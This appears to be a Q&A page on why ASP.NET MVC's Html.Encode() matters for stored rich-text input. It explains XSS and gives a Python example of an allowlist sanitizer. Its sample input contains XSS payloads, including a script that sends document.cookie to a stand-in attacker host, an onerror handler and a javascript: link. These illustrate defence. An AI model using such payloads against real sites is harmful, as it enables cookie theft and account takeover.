Tags: asp.net-mvc, encoding, html.encode

Why do I need to do Html.Encode()?


If I have a user entering data into a rich text editor (tiny editor) and submitting data that I am storing in a database and then retrieving to show on other dynamic web pages, why do I need encoding here?

Is the only reason that someone might paste JavaScript into the rich text editor? Is there any other reason?


Solution

  • Security is the reason.

    The most obvious/common reason is cross-site scripting (XSS). It turns out to be the root cause of the security problems you might witness on your site.

    Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.

    Additionally, as shown in the comments below, the layout of your site can also be screwed up.

    You need the Microsoft Anti-Cross Site Scripting Library.

    More Resources

    http://forums.asp.net/t/1223756.aspx
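The two points in the answer above (script injection and broken page layout) and the catch with rich-text input can be shown concretely. The following is an added example, not code from the question, the answer, ASP.NET MVC or the Microsoft Anti-XSS library; it is written in Python as a language-neutral illustration. `html_encode` reproduces what `Html.Encode()` does (the five HTML metacharacters become entities, so stored content is rendered as text, never parsed as markup). But rich-text editor output is HTML that you do want rendered, so encoding it wholesale turns the user's formatting into visible angle brackets. The usual answer for that case is an allowlist sanitizer, sketched here as a hypothetical `AllowlistSanitizer`: it keeps only known-safe tags and attributes, drops `<script>` bodies, event-handler attributes and `javascript:` URLs, and closes every tag the input left open so the fragment cannot swallow the rest of the page. The sample payload `STORED_RICH_TEXT` is constructed for the example.

```python
"""Html.Encode() versus allowlist sanitisation of stored rich-text input (added example)."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of what could be pasted into (or POSTed past) a rich-text editor
# and stored in the database unchanged.
STORED_RICH_TEXT = (
    '<p>Hello <b>world</b></p>'
    '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    '<img src="https://example.com/a.png" onerror="alert(1)">'
    '<a href="javascript:alert(2)">click</a>'
    '<a href="https://example.com" target="_blank">ok link</a>'
    '<p><b>unclosed bold runs into the rest of the page'
)


def html_encode(text: str) -> str:
    """What Html.Encode() does: & < > " ' become entities, so the browser shows the
    string as text. Safe, but it also shows the user's <b> and <p> as literal text."""
    return html.escape(text, quote=True)


# Hypothetical allowlist for rendering rich text. Anything not listed is dropped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "u", "ul", "ol", "li", "br", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
# URLs must carry an explicit safe scheme. Relative URLs are dropped on purpose:
# browsers strip tabs/newlines inside "java\nscript:", which a lenient parser
# would otherwise classify as relative.
SAFE_URL_SCHEMES = {"http", "https", "mailto"}


class AllowlistSanitizer(HTMLParser):
    """Rebuilds an HTML fragment keeping only allowlisted tags and attributes.
    Text nodes are re-encoded on output, <script>/<style> bodies are discarded,
    and tags still open at the end are closed so the fragment cannot break
    the layout of the page that embeds it."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped; its text content is still kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onerror, onclick, style, target, ...
            if name in ("href", "src"):
                if urlparse(value or "").scheme.lower() not in SAFE_URL_SCHEMES:
                    continue  # drops javascript:, data:, vbscript: and relative URLs
            kept.append(f' {name}="{html_encode(value or "")}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return  # stray close tag: ignore it
        # Close everything down to the matching tag; this also repairs mis-nesting.
        while self.open_tags:
            closed = self.open_tags.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html_encode(data))  # text is always re-encoded

    def result(self) -> str:
        while self.open_tags:  # close whatever the input left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_rich_text(fragment: str) -> str:
    """Return a fragment that is safe to emit without Html.Encode() around it."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


if __name__ == "__main__":
    print("Encoded (shown as text):", html_encode(STORED_RICH_TEXT))
    print("Sanitised (rendered as HTML):", sanitize_rich_text(STORED_RICH_TEXT))
```

The design choice worth noting is that the sanitizer is an allowlist, not a blocklist of "dangerous" tags: the `<img onerror>` and `javascript:` cases show why a blocklist of `<script>` alone is not enough. Plain, non-rich fields should still go through `Html.Encode()` on output; the sanitizer is only for the fields whose HTML you intend to render.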